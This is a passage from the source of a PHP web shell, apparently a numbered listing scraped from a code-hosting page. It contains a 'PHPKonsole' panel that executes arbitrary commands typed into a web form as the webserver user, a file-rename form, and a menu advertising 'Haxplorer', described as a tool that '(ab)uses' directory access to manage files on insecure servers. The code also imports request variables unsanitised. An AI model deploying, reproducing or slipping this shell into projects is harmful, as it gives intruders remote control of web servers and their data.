781	}
782	else {
783	$inputfile = "";
784	}
785	echo "<center><table><tr><td><form action=\"$SFileName\" method=\"post\">\n";
786	echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
787	echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
788	echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
789	echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
790	echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
791	echo "Rename \"$oldfile\" to:<br>\n";
792	echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
793	echo "</form><form action=\"$SFileName\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
794	echo "</td></tr></table></center>";
795	}
796	}
797	else if ( $cmd == "con") {
798
799	?>
800	<center>
801	<table>
802	<tr><td>
803	<h3>PHPKonsole</h3>
804
805	<?php
806
807	if (ini_get('register_globals') != '1') {
808	if (!empty($HTTP_POST_VARS))
809	extract($HTTP_POST_VARS);
810
811	if (!empty($HTTP_GET_VARS))
812	extract($HTTP_GET_VARS);
813
814	if (!empty($HTTP_SERVER_VARS))
815	extract($HTTP_SERVER_VARS);
816	}
817
818	if (!empty($work_dir)) {
819	if (!empty($command)) {
820	if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
821	if ($regs[1][0] == '/') {
822	$new_dir = $regs[1];
823	} else {
824	$new_dir = $work_dir . '/' . $regs[1];
825	}
826	if (file_exists($new_dir) && is_dir($new_dir)) {
827	$work_dir = $new_dir;
828	}
829	unset($command);
830	}
831	}
832	}
833	if (file_exists($work_dir) && is_dir($work_dir)) {
834	chdir($work_dir);
835	}
836	$work_dir = exec('pwd');
837	?>
838
839	<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
840	<table border=0 cellspacing=0 cellpadding=0 width="100%"><tr><td>Current working directory: <b>
841	<input type="hidden" name="cmd" value="con">
842	<?php
843	$work_dir_splitted = explode('/', substr($work_dir, 1));
844	printf('<a href="%s?cmd=con&stderr=%s&work_dir=/">Root</a>/', $PHP_SELF, $stderr);
845	if (!empty($work_dir_splitted[0])) {
846	$path = '';
847	for ($i = 0; $i < count($work_dir_splitted); $i++) {
848	$path .= '/' . $work_dir_splitted[$i];
849	printf('<a href="%s?cmd=con&stderr=%s&work_dir=%s">%s</a>/', $PHP_SELF, $stderr, urlencode($path), $work_dir_splitted[$i]);
850	}
851	}
852	?></b></td>
853	<td align="right">Choose new working directory: <select class="inputtext" name="work_dir" onChange="this.form.submit()">
854
855	<?php
856	$dir_handle = opendir($work_dir);
857	while ($dir = readdir($dir_handle)) {
858	if (is_dir($dir)) {
859	if ($dir == '.') {
860	echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
861	} elseif ($dir == '..') {
862	if (strlen($work_dir) == 1) {
863	}
864	elseif (strrpos($work_dir, '/') == 0) {
865	echo "<option value=\"/\">Parent Directory</option>\n";
866	} else {
867	echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
868	}
869	} else {
870	if ($work_dir == '/') {
871	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
872	} else {
873	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
874	}
875	}
876	}
877	}
878	closedir($dir_handle);
879	?>
880	</select></td></tr></table>
881	<p>Command: <input class="inputtext" type="text" name="command" size="60">
882	<input name="submit_btn" class="inputbutton" type="submit" value="Execute Command"></p>
883	<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"<?php if ($stderr) echo " CHECKED"; ?>></p>
884	<textarea cols="80" rows="19" class="inputtextarea" wrap=off readonly><?php
885	if (!empty($command)) {
886	echo "phpKonsole> ". htmlspecialchars($command) . "\n\n";
887	if ($stderr) {
888	$tmpfile = tempnam('/tmp', 'phpshell');
889	$command .= " 1> $tmpfile 2>&1; " . "cat $tmpfile; rm $tmpfile";
890	} else if ($command == 'ls') {
891	$command .= ' -F';
892	}
893	$output = `$command`;
894	echo htmlspecialchars($output);
895	}
896	?></textarea>
897	</form>
898
899	<script language="JavaScript" type="text/javascript">
900	document.forms[0].command.focus();
901	</script>
902	</td></tr></table>
903	<?php
904	}
905	else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
906	$isMainMenu = true;
907	?>
908	<table width="100%" border="0" cellpadding="0" cellspacing="0">
909	<tr>
910	<td width="100%" class="border">
911	<center> -<[{ <?php echo $scriptTitle ?> Main Menu }]>- </center>
912	</td>
913	</tr>
914	</table>
915	<br>
916	<center>
917	<table border="0" NOWRAP>
918	<tr>
919	<td valign="top" class="silver border">
920	<a href="<?php echo $SFileName ?>?cmd=dir&dir=.">  <font color="navy"><strong>==> Haxplorer <==</strong></font>  </a>
921	</td>
922	<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
923	Haxplorer is a server side file browser wich (ab)uses the directory object to list
924	the files and directories stored on a webserver. This handy tools allows you to manage
925	files and directories on a unsecure server with php support.<br><br>This entire script
926	is coded for unsecure servers, if your server is secured the script will hide commands
927	or will even return errors to your browser...<br><br>
928	</td>
929	</tr>
930	<tr>
931	<td valign="top" class="silver border">
932	<a href="<?php echo $SFileName ?>?cmd=con">  <font color="navy"><strong>==> PHPKonsole <==</strong></font>  </a>
933	</td>
934	<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP>
935	<br>PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver.
936	When you run commands they will run as the webservers UserID. This should work perfectly
937	for managing files, like moving, copying etc. If you're using a linux server, system commands
938	such as ls, mv and cp will be available for you... <br><br>This function will only work if the
939	server supports php and the execute commands...
940	<br><br>
941	</td>
942	</tr>
943	</table>
944	</center>
945	<br>
946	<?php
947	}
948
949	if ($cmd != "downl") {
950	if ( $isMainMenu != true) {
951	?>
952	<table width="100%" border="0" cellpadding="0" cellspacing="0">
953	<tr>
954	<td width="100%" style="class="silver border">
955	<center><strong>
956	<a href="<?php echo $SFileName ?>"><font color="navy">[ Main Menu ]</font></a>
957	<a href="<?php echo $SFileName ?>?cmd=con"><font color="navy">[ PHPKonsole ]</font></a>
958	<a href="<?php echo $SFileName ?>?cmd=dir&dir=."><font color="navy">[ Haxplorer ]</font></a>
959	</strong></center>
960	</td>
961	</tr>
962	</table>
963	<br>
964	<?php
965	}
966	?>
967	</td>
968	</tr>
969	<tr>
970	<td width="100%" height="15" class="silver border">
971	<center> <?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?> </center>
972	</td>
973	</tr>
974	</table>
975	</td>
976	</tr>
977	</table>
978
979	<?php
980	}
981
982	?>
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997

Download in other formats:

Original Format